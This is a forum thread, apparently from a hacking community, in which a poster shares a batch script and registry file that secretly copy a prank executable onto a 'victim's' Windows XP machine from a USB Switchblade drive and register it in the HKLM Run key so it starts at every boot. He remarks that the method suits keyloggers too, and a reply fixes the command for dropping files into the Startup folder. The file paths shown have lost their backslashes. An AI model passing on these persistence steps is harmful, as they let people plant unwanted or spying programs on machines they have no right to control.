Startup... You silly, stubborn, little folder.

[AndyzBong]

So I've been messing around lately with a couple of home-brew payload additions for my USB Switchblade and I decided that I wanted one of my particular payloads to be dumped in my "victims" Startup folder (for execution upon the next reboot). Note: My payload addition is just a harmless prank for a friend of mine. All the program does is continually loop vbCritical MsgBoxs that say "Your system is critically running low on virtual memory!". Hence the program is named VirtuMem.exe

It all seemed simple enough right?

copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup

Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me) or I had to find another solution around this. Anywho, if you are familiar with SysInternal's freeware program called AutoRuns; then you know that applications such as AIM, QuickTime, Symantec, and other software-vendors can autorun their applications upon login without having a .LNK file in the Startup folder.

My solution to the problem was merely to copy a version of VirtuMem into my WIPCMD folder and create a *.reg file (named startup.reg) like so:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"VirtuMem"="C:WINDOWSSYSTEM32VirtuMem.exe"

and then add the following code to my go.cmd file:

@echo [START AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1
echo. >> Documentslogfiles%computername%.log 2>&1

copy H:WIPCMDVirtuMem.exe C:WINDOWSSYSTEM32
regedit.exe /s WIPCMDstartup.reg

echo. >> Documentslogfiles%computername%.log 2>&1
@echo [END AutoRun VirtuMem via RegEdit] >> Documentslogfiles%computername%.log 2>&1

I just figure it was a neat trick that I would share with the community. This would work well for keyloggers or any other applications that you may want to run at startup, without keeping the file in the Startup folder. This also could be used for non-malicious purposes... I can clearly see the teenage computer network lab technician who hates the WeatherBug's autorun on all the campus lab computers due to AOL Instant Messenger (and deleting the registry values instead of importing them).

Final Note: I have not yet tried this on my "friend". I am not responsible for you screwing up your Windows Registry and not making backups of your vast pr0n collection or your Windows Registry. I will let you know how the results go, but so far; this code is untested.

In conclusion, if you have a different way around Startup, or if my syntax is completely wrong, or if I am completely wrong, or if you've liked this minor piece of info; let me know. This code is for Windows XP Pro (as far as I know). Peace.

- AndyzBong

[GonZor]

It all seemed simple enough right?

copy H:WIPCMDVirtuMem.exe C:Documents and SettingsAll UsersStart MenuProgramsStartup

Nope! Incorrect syntax. So I tried copy H:WIPCMDVirtuMem.exe C: and... tada! Either my syntax is wrong (please feel free to enlighten me)...

You were missing the quotes from around your destination, it should have read

copy "H:WIPCMDVirtuMem.exe" "C:Documents and SettingsAll UsersStart MenuProgramsStartup" /y

Notice the quotes around the source and destination pats, didn't need them around the source because there are no spaces but I do it anyway, I also added a /y switch to copy the file even if it exists (just to make sure its your file not a dummy file).

[AndyzBong]

Enlightened about the quotations, gotta read my Windows CL book more.... I knew the /y was supposed to go in there somewhere. Thanks GonZor; this is why I am a Hackling and you are a Zombie.

[GonZor]

this is why I am a Hackling and you are a Zombie.

As long as I'm not a penguin its ok by me  :P

Just remember /? is your friend, some of the explanations are very basic but most of them are quite useful